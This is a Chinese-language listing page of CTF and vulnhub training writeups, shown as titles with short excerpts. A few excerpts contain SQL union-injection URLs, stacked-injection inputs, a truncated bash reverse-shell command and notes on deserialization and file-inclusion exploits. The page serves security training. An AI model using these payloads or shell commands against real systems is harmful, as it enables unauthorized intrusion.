WriteUp

利用ret2libc绕过DEP安全机制

文中writeup收集自互联网,但本文主题是介绍ret2libc借例子一用,姑且算原创吧。
_well_s·2023-10-04 14:37

第六届”蓝帽杯“全国大学生网络安全技能大赛半决赛部分WriteUp

Webeasyfatfreephp框架反序列化,简单题,直接全局搜索__destruct只有一个可用Jig#__destruct调用到Base#wirte,然后直接写入文件。刚开始做的时候想得麻烦了……function__destruct(){if($this->lazy){$this->lazy=FALSE;foreach($this->data?:[]as$file=>$data)$this-
mxx307·2023-10-04 11:53

bugku web 17~24 write up

bugkuweb17~24writeupflag在index里打开页面有一个链接,点击链接发现url栏出现file,关键字想到文件包含漏洞。
h0ryit·2023-10-04 05:12

红队打靶:THE PLANETS: MERCURY打靶思路详解(vulnhub)

主机发现和端口扫描第二步:Web渗透第三步:获取初步立足点并搜集信息第四步:软连接劫持sudo提权总结与思考写在开头本篇博客在自己的理解之上根据大佬红队笔记的视频进行打靶,详述了打靶的每一步思路,并非复现writeup
Bossfrank·2023-10-03 00:57

ctf之crypto练习二

一、js代码分析之编码转换writeup:打开index.html//首先调用.js脚本varic=false;#默认ic值为falsevarfg="";functiongetFlag(){//function
渗透测试中心·2023-10-02 16:49

ctf-wiki ARM ROP Codegate2018_Melong题解

写在前面ctf-wiki关于armpwn的arm-ROP中的例题是Codegate2018_Melong,但在网上一直没找到writeup,这里跟着官方解给出的exp调试记录。确定保护$file.
飞熊先生·2023-10-01 09:35

第一届“龙信杯”电子数据取证竞赛Writeup

目录移动终端取证请分析涉案手机的设备标识是_______。(标准格式:12345678)请确认嫌疑人首次安装目标APP的安装时间是______。(标准格式:2023-09-13.11:32:23)此检材共连接过______个WiFi。(标准格式:1)编辑嫌疑人手机短信记录中未读的短信共有______条。(标准格式:12)嫌疑人检材手机在浏览器中下载海报背景图的网址是_______。(标准格式:ht
双层小牛堡·2023-10-01 02:45

dorabox靶场writeup

靶场搭建这里我直接采用Windows下的wamp集成环境,直接将靶场源码下载到本地,解压到网站根目录即可。网站源码下载地址:https://github.com/Acmesec/DoraBox数据库的配置,修改conn.php的数据库连接账号及密码,在本地数据库创建一个pentest数据库,将pentest.sql文件导入到数据库中,在创建的库中执行sourceD:/wamp/www/DoraBo
硬核韦恩·2023-09-28 03:32

BUUCTF在线靶场 部分WEB Writeup(updating)

Warmup提示source.php,访问/source.php查看内容提示source.php,访问/hint.php查看内容需要对$page(可以用get方式或者post方式进行传入)进行拼接来绕过mb_strpos()函数,其中网页对传入的$page参数进行了urldecode(),%253经过两次url,触发网页底部的include()函数从而可以利用文件包含漏洞//mb_strpos()
Le叶a子f·2023-09-28 03:30

墨者学院在线靶场writeup

入门WEB页面源代码查看打开是一个HTML页面,鼠标右键被禁用,直接F12,控制台点Elements看源代码,就发现key了WEB页面分析打开靶场F12,看到注释,按照注释方法构造url,index.php?url=login.php,跳转拿到key服务器返回数据查看F12打开控制台,点击network,点击ip,点heards,然后展开response就可以看到key浏览器信息伪造题目提示从微信
SpongeB0B·2023-09-28 03:00

HTB Lame[Hack The Box HTB靶场]writeup系列1

首先祈祷一下SARS病情尽快过去,武汉加油!湖北加油!为了不给国家添乱,所以我在HTB订阅了VIP,准备搞下RetiredMachines的靶机。目录0x00靶场介绍0x01扫描端口0x02ftp服务0x03smb服务0x00靶场介绍我们从第一个lame开始。如何注册账号,购买vip,网上有大把文章,这里我就不再记录了。这个系列主要是记录我的攻击过程和思考过程。0x01扫描端口root@kali:
3riC5r·2023-09-28 03:28

暗月中秋靶场活动writeup

前言暗月在中秋节搞了个靶场活动,一共有4个flag,本着增长经验的想法参加了本次活动,最终在活动结束的时候拿到了3个flag,后面看了其他人的wp也复现拿到第四个flag。过程比较曲折,所以记录一下。靶场地址103.108.67.223103.148.244.120备用ip初步测试直接访问ip只有活动介绍页面所以我们做些基本的信息收集,先扫描下端口,结果如图发现有redis,想着如果有redis未
hrayha·2023-09-28 03:57

buuoj 丢失的MD5 writeup

题目(十三):【题型】crypto【题目】丢失的MD5【来源】(buuoj)https://buuoj.cn/challenges#%E4%B8%A2%E5%A4%B1%E7%9A%84MD5【思路】将字节解码为字符串。【具体步骤】Step1:根据题目是python代码不完全正确,进行修改。该hexdigest()方法在Python3中返回一个字节对象,因此需要将其解码为字符串。Step2:我把e
22的卡卡·2023-09-27 23:08

BugkuCTF—代码审计—WriteUp(持续更新)

BugkuCTF—代码审计—WriteUp(持续更新)extract变量覆盖首先分析下代码:extract函数:image.png[http://123.206.87.240:9009/1.php](http
syxvip·2023-09-26 14:40

CSAPP Attack Lab

稍微补充了一下知识,差点让第二部分吓到,没想到做起来还挺简单哈这次任务是让我们当一个远古时期的萌新黑客,是不是很酷呀这次上来才发现看不懂让干啥,于是乎就去看了某个视频,惊讶的发现这玩意除了有README还有Writeup
DyingLive·2023-09-26 10:54

BUUCTF [SUCTF 2019]EasySQL1 writeup(详细版)

考点:堆叠注入,MySQL和mssql中||运算符的区别,运算符的意义转换(操作符重置,短路算法打开靶机,尝试输入1查看回显:可以看到表格回显了内容:1,用其他非0数字尝试全都回显1,那我们换个数字尝试,比如0:什么都没有。用字母同理无回显。使用Sql堆叠注入查看信息,先用show指令查看数据库:1;showdatabases;再查看一下表:1;showtables;看到Flag表,猜测flag应
今天不用学物理吧·2023-09-26 09:09

陇剑杯 2021 write up整理

竞赛writeup收集和整理陇剑杯2021writeup整理1签到题1.12JWT2.12.22.32.42.52.63webshell3.13.23.33.43.53.63.74日志分析4.14.24.35
倔强的青铜选手。。。·2023-09-24 17:34

陇剑杯Writeup(部分)

1、签到http协议网络攻击2JWT2.1该网站使用了_JWT_认证方式。2.2黑客绕过验证使用的jwt中,id和username是_10087#admin_。2.3黑客获取webshell之后,权限是_root_?2.4黑客上传的恶意文件文件名是/tem/1.c___。2.5黑客在服务器上编译的恶意so文件,文件名是looter.so___。2.6黑客在服务器上修改了一个配置文件,文件的绝对路径
The True H00HA·2023-09-24 17:03

Vulnhub靶机Lampiao:1 writeup

目录信息搜集获取IP地址扫描开放的端口80端口1898端口列举目录getshell提权下载地址:https://www.vulnhub.com/entry/lampiao-1,249/信息搜集获取IP地址扫描开放的端口80端口80端口没有任何发现1898端口发现启动了Drupal7列举目录发现有熟悉的rebots.txt在CHANGELOG.txt文件里面发现了Drupal的版本是7.54gets
Sword-豪·2023-09-24 13:46

Vulnhub靶机 VULNOS: 2 writeup

下载地址:https://www.vulnhub.com/entry/vulnos-2,147/信息搜集获取IP地址扫描端口80端口点击website跳转到/jabc在jabc/?q=node/7页面看起来啥也没有,但是Ctrl+A全选之后看到提示还有一个目录/jabcd0cs/访问/jabcd0cs/在/jabcd0cs/发现CMS的版本,使用searchsploit查询这里看到了pyloadh
Sword-豪·2023-09-24 13:46

Vulnhub靶机Bob_v1.0.1 writeup

下载地址:https://www.vulnhub.com/entry/bob-101,226/信息搜集扫描IP地址扫描端口及端口信息访问80端口并没有发现有用的信息扫描目录看到有熟悉的robots.txt,访问看一下发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令getshellbash反弹shellbash-c'execbash-i&>/
Sword-豪·2023-09-24 13:46

CTFHub bak文件和vim缓存

index.php.bak就行我使用dirmap扫描出来的(dirmap下载可以搜到怎么下载安装,下载下来之后一定要先装文件里的.txt文件,pipinstall-rrequirement.txt)vim真不会,看了writeup
ds_0804·2023-09-24 13:45

CTF--攻防世界-杂项入门第一课

这是第一次接触杂项这个方向,所以就是根据writeup解的题,没有什么自己的思路,只是写一篇文章来记录一下解题过程。
丞星星祺气球·2023-09-23 17:20

Zipping

信息收集漏洞利用空字节绕过---->失败sqlI-preg_matchbypass反弹shell稳定维持提权-共享库漏洞参考:https://rouvin.gitbook.io/ibreakstuff/writeups
echokp·2023-09-23 15:22

攻防世界 Web Writeup Part1 <简单部分>

攻防世界Web进阶部分题解FlatScience通过这题学到一些SQLite的语法,wget的应用robots.txt找到两个隐藏文件。进入login.php,注入了一番好像没什么效果,查看源码发现一个debug选项,于是在URL后面加上?debug得到源码query("SELECTid,namefromUserswherename='".$user."'andpassword='".sha1($
Arklight·2023-09-23 14:55

第八届GeekGame2017 Writeup By Assassin

差点错过这个好玩的比赛WEB故道白云最最基本的注入了吧,首先测试没有过滤#号,然后大家应该就知道干啥了http://game.sycsec.com:2006/?submit=submit&id=0'unionselect1,1%23http://game.sycsec.com:2006/?submit=submit&id=0'unionselectSCHEMA_NAME,1frominformat
Assassin__is__me·2023-09-22 01:28

Upload-labs|Pass01-Pass20全解

目录前言WriteUpPass-01Pass-02Pass-03Pass-04Pass-05Pass-06Pass-07Pass-08Pass-09Pass-10Pass-11Pass-12Pass-13Pass
Iam碳酸氢钠·2023-09-21 09:36

CTFShow愚人杯|非预期解-Web-WriteUp

目录Misc-WriteUpWriteUpeasy_signin被遗忘的反序列化easy_sstieasy_flaskeasy_phpMisc-WriteUpMisc1Misc2WriteUpeasy_signin
Iam碳酸氢钠·2023-09-21 09:05

CTFShow|Web入门-信息收集 1-20题全解

目录前言WriteUpweb1web2web3web4web5web6web7web8web9web10web11web12web13web14web15web16web17web18web19web20
Iam碳酸氢钠·2023-09-21 09:05

CTFShow愚人杯|Misc-WriteUp1

目录链接前言WriteUp11.奇怪的压缩包2.哇库哇库23.琴柳感链接WebMisc2前言每天下午六点定时更新这次CTFShow的愚人杯,第一晚勉强上榜了,第二天睡醒还没掉下去,不过第二天打了另一场比赛
Iam碳酸氢钠·2023-09-21 09:05

红队打靶:Fowsniff打靶思路详解(vulnhub)

Web渗透第三步:pop3服务器渗透第四步:获取初始立足点第五步:ssh登陆的banner脚本提权总结与思考写在开头本篇博客在自己的理解之上根据大佬红队笔记的视频进行打靶,详述了打靶的每一步思路,并非复现writeup
Bossfrank·2023-09-21 04:14

攻防世界题目练习——Web难度1(二)

根据WriteUp提示先f12查看源码,发现了文件包含的漏洞点lan.php文件,如图:$lan的值来自cookie中的language值,并且注意,include中有".ph
什么都没学会·2023-09-19 16:45

攻防世界题目练习——Misc杂项难度1(一)

题目目录1.Banmabanma2.适合作为桌面第一次接触这种类型的题,解题全靠WriteUp1.Banmabanma用到在线扫描工具inlite在线工具题目就是一张图片,斑马图案看起来是条形码,因此用扫码工具扫描
什么都没学会·2023-09-19 16:45

IceCTF2018-Revers Engineering pokeamango Writeup

下载apk安装查看功能,发现是抓取mango:D,要求抓到151只直接给flag解压apk看内容apk搭载了http内容,通过js脚本的http请求实现,只看mango.js和store.js就可以js脚本.pngmangojs.pngstorejs.pnguuid通过抓包查看实现脚本如下importrequestsimportjsonimportrandomimporttimejs={}head
D0j0kur0·2023-09-19 05:24

红队打靶:LampSecurity:CTF7打靶思路详解(vulnhub)

Web渗透第三步:文件上传获取shell第四步:寻找敏感信息(登录凭据)第五步:密码喷射登录ssh第六步:提权总结与思考写在开头本篇博客根据大佬红队笔记的视频进行打靶,详述了打靶的每一步思路,并非复现writeup
Bossfrank·2023-09-18 23:27

红队打靶:SickOS1.1详细打靶思路(vulnhub)

目录写在开头第一步:主机发现和端口扫描第二步squid代理分析第三步:web渗透第四步:提权总结与思考写在开头本篇博客还是根据大佬红队笔记的视频进行打靶,详述了打靶的每一步思路,并非复现writeup
Bossfrank·2023-09-18 23:26

红队打靶:W1R3S: 1.0.1详细打靶思路(vulnhub)

不同于简单的writeup,红队笔记在渗透测试的每一步中的做法都有阐释。逻辑明确,纵然是简单的靶机也有很多知识点,故此做一个总结。
Bossfrank·2023-09-18 23:56

红队打靶:Me and My Girlfriend打靶思路详解(vulnhub)

主机发现和端口扫描第二步:Web渗透(修改XFF代理)第三步:数据库手工枚举第四步:sudophp提权总结与思考写在开头本篇博客在自己的理解之上根据大佬红队笔记的视频进行打靶,详述了打靶的每一步思路,并非复现writeup
Bossfrank·2023-09-18 23:26

PWNHUB 七月内部赛 babyboa、美好的异或 Writeup

image这次的PWNHUB内部赛的两道题目都不是常规题,babyboa考察的是BoaWebserver的cgi文件的利用,美好的异或考察的则是通过逆向分析解密函数来构造栈溢出ROP。两道题目的考点都非常新颖,其中第一道题更是结合了Web,值得大家复现学习。babyboa这道题的外表就是一个Web页面image但是实际上他的主要内容都在cgi文件中imagecgi文件是使用静态编译的,这在线下比赛
403f1874eb7f·2023-09-18 20:03

ctfshow—溯源—初学乍练

0x00前言CTF加解密合集CTFWeb合集网络安全知识库溯源相关CISP汇总文中工具皆可关注皓月当空w公众号发送关键字工具获取0x01题目给了一张飞机的图片,然后问目的地0x02WriteUp首先是给了这样一个图片
Wcbddd·2023-09-17 01:53

ctfshow—web—一切看起来都那么合情合理

0x00前言CTF加解密合集CTFWeb合集网络安全知识库溯源相关CISP汇总文中工具皆可关注皓月当空w公众号发送关键字工具获取0x01题目0x02WriteUp简单看下,然后扫一下目录,发现一个www.zip
Wcbddd·2023-09-17 01:52

F5图片加密算法

www.shiyanbar.com/ctf/1938给了一张图片,提示刷新刷新,由此想到F5加密算法;www.shiyanbar.com/ctf/writeup/1067这里writeup写的非常详细;
Jayus_0821·2023-09-15 14:57

ctfshow-web-红包题 辟邪剑谱

0x00前言CTF加解密合集CTFWeb合集网络安全知识库溯源相关文中工具皆可关注皓月当空w公众号发送关键字工具获取0x01题目0x02WriteUp这道题主要是考察mysql查询绕过的问题。
Wcbddd·2023-09-15 10:25

2022蓝帽杯半决赛

fu9A8sdgfMsfsdrfE4q6#cf7af0fc1c参考奇安信攻防社区-第六届“蓝帽杯”半决赛取证题目官方解析2022蓝帽杯半决赛取证题目Writeup-DIDCTF-Blog2022第六
木…·2023-09-15 02:21

ctfshow-web-红包题第九弹

0x00前言CTF加解密合集CTFWeb合集网络安全知识库溯源相关文中工具皆可关注皓月当空w公众号发送关键字工具获取0x01题目0x02WriteUp首先看到的是一个登录框,登录一下,发现一个疑似SSRF
Wcbddd·2023-09-14 04:46

ctfshow-web-红包题 葵花宝典

0x00前言CTF加解密合集CTFWeb合集网络安全知识库溯源相关文中工具皆可关注皓月当空w公众号发送关键字工具获取0x01题目0x02WriteUp这道题说实话比较奇怪,有一个注册接口,先注册一个账号在
Wcbddd·2023-09-14 04:46

2021-11-27-2021年春秋杯网络安全联赛秋季赛Misc部分题以及Crypto密码题WriteUp

部分Misc&Crypto复现Misc一、问卷调查(签到题)二、Secret_chart三、hellosharkCrypto一、VigenereMisc一、问卷调查(签到题)网站:https://www.wenjuan.com/s/UZBZJvFDXDD/得到flag:flag{让我们一起带给世界安全感}二、Secret_chart步骤:1、拿到题目压缩包先对压缩包进行压缩,得到一张图片,在bin
疯狂的1998·2023-09-12 05:17

Writeup 实验吧/密码学/奇怪的短信/1920

http://www.shiyanbar.com/ctf/19200x00短信,打开手机键盘,数字分组335321414374744361715332flagissimpleCTF{flagissimple}
growing27·2023-09-11 13:20

adworld-web2

web2GFSJ0627积分2金币291最佳Writeup由Robert_Wei提供收藏反馈难度:2方向:Web题解数:108解出人数:10185题目来源:CTF题目描述:解密题目场景:http://61.147.171.105
32进制·2023-09-11 10:38

Roar CTF 2019 WEB

太菜了,只能等到writeup出了再来复现1、EasyCalc打开网页,显示让我们输入表达式image查看源代码,发现有个calc.php文件,访问calc.php看看显示出了calc.php的源码分析这个代码
失眠是真滴难受·2023-09-10 23:48
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他